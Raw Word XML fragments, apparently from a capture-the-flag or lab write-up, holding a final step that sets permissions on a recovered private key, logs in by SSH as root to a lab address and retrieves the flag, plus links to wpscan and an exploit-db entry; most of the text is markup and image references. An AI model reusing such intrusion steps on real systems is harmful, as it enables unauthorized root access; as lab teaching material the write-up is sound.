    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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chmod 600 id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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connect:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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ssh root@172.16.14.198 -i id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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Thus, we successfully establish a connection as the root user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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can retrieve the final flag located in the root directory:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">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3022600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="64"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headerReference r:id="rId32" w:type="default"/>
      <w:headerReference r:id="rId33" w:type="first"/>
      <w:headerReference r:id="rId34" w:type="even"/>
      <w:footerReference r:id="rId35" w:type="default"/>
      <w:footerReference r:id="rId36" w:type="first"/>
      <w:footerReference r:id="rId37"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B">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="6"/>
    <w:bookmarkEnd w:id="6"/>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1" name="image4.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image4.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4C">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4D">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5.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8" name="image3.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image3.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File Manager</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26.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image26.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5.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1.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.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22.png"/><Relationship Id="rId25"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5.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1.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/wpscanteam/wpscan" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/49178" TargetMode="External"/><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6.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4l8Nl1dATqoiBYnfZWDd3Y45Q==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLnVvYjh4dzVyanU4MTIOaC4xdXJxMjNqYWtnZmUyDmguMTc1ZjVjczk0ejBvOAByITFkdVU4NXRFQ0FUTmxXdFJJcHFxTFFYNVdTQjZMM1djOQ==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